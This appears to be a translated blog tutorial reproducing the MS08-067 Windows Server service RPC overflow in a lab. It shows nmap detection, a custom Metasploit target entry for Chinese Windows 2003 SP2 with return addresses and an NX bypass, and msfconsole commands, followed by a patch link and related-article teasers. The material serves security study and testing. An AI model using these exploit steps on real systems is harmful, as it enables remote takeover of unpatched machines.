MS08-067 RPC request buffer overflow exploit

tags: Vulnerability recurrence  Safety  Security breach  information security


Vulnerability description

  A remote code execution vulnerability exists in the server service on the Windows system. The vulnerability is caused by the service incorrectly handling specially crafted RPC requests. An attacker who successfully exploited this vulnerability could take complete control of the affected system.

Influence system

  • Windows Vista
  • Windows 2000 Service
  • Windows Server 2008
  • Windows Server 2003
  • Windows XP

Vulnerability detection

Nmap for vulnerability detection

#nmap target ip --script=smb-vuln-ms08-067.nse
nmap 192.168.234.129 --script=smb-vuln-ms08-067.nse

promptVULNERABLEIndicates that the vulnerability exists

Exploit

The exploit tool is msf, and the system I reproduced is the Chinese version of Windows Server 2003 SP2. But I found that there is no Chinese version of the exp framework in msf.

Add the exploit code:

#Modify msf exploit code
vim /usr/share/metasploit-framework/modules/exploits/windows/smb/ms08_067_netapi.rb

Add the following content:

 [ 'Windows 2003 SP2 Chinese (NX)',
   {
	  'RetDec'    => 0x7c99beb8,  # dec ESI, ret @NTDLL.DLL (0x4EC3)
	  'RetPop'    => 0x7cb5e84e,  # push ESI, pop EBP, ret @SHELL32.DLL(0x565DC3)
	  'JmpESP'    => 0x7c99a01b,  # jmp ESP @NTDLL.DLL(0xFFE4)
	  'DisableNX' => 0x7c96f517,  # NX disable @NTDLL.DLL
          'Scratch'   => 0x00020408,
   }
],

#Enter msf
msfconsole

#Find the vulnerability framework and call
search ms08-067
use exploit/windows/smb/ms08_067_netapi

When viewing the system exp framework, you can see what we have addedwindwos 2003 SP2 Chinese

show targets



Set the target ip and other parameters, you can start the attack

set target 1
set rhost 192.168.234.129
show options


Vulnerability hardening

Microsoft has released the MS08-067 patch:
http://technet.microsoft.com/zh-cn/security/bulletin/ms08-067

Intelligent Recommendation

Buffer overflow exploit

1. Open Easy File Sharing Web server and change the port to 8000 2. First find the local IP address Then open the kali terminal and enter: nmap 10.34.25.83 (local ip) (To use the local ip address, the...

MS08-067 Remote Overflow Vulnerability (CVE-2008-4250)

MS08-067 Remote Overflow Vulnerability   Brief description of the vulnerability principle The attacker uses the default open SMB service port 445 of the victim host to send a special RPC (Remote ...

[Vulnerability recurrence] MS08-067 classic remote overflow vulnerability recurrence

ms08-067 introduction The MS08-067 vulnerability will affect all Windows systems except Windows Server 2008 Core, including: Windows 2000/XP/Server 2003/Vista/Server 2008 versions, and even Windows 7 ...

ms08-067 recurrence

nmap scanning system for vulnerabilities, scanning system information nmap --script = vuln 192.168.64.137 Check for common vulnerabilities nmap -O detection system version Start msfconsole, search for...

MS08-067 vulnerability reproduction

Vulnerability introduction: The MS08-067 vulnerability will affect all Windows systems except Windows Server 2008 Core, including: Windows 2000/XP/Server 2003/Vista/Server 2008 versions, and even Wind...

More Recommendation

MS08-067 reproduce

MS08-067 reproduce basic introduction Introduction: MS08-067 is a huge vulnerability that broke out in 2008. It existed in all Microsoft systems at the time and was extremely lethal Attack principle: ...

MS08-067 penetration

MS08-067 penetration This vulnerability is more famous and does not require much introduction. Start to penetrate directly. Infiltration preparation windows xp and kali (both are in the same network) ...

MS08-067 Vulnerability Utilization

Vulnerability introduction: If the user receives a special RPC request on the affected system, the vulnerability may allow remote execution code. At Microsoft Windows 2000, Windows XP, and Windows Ser...

MS08-067 vulnerability

MS08-067 vulnerability lab environment 1.kali linux(ip:192.168.131.131) 2.windows xp (ip:192.168.131.134) Port detection nmap 192.168.131.134 It is found that high-risk ports such as 445 and 3389 are ...

MS08-067 Utilization

Purpose Using the MS08-067 vulnerability in the Windows platform, the remote command execution operation was successfully performed, and the 3389 remote login was successfully performed. Ports used: 4...

Copyright  DMCA © 2018-2026 - All Rights Reserved - www.programmersought.com  User Notice

Top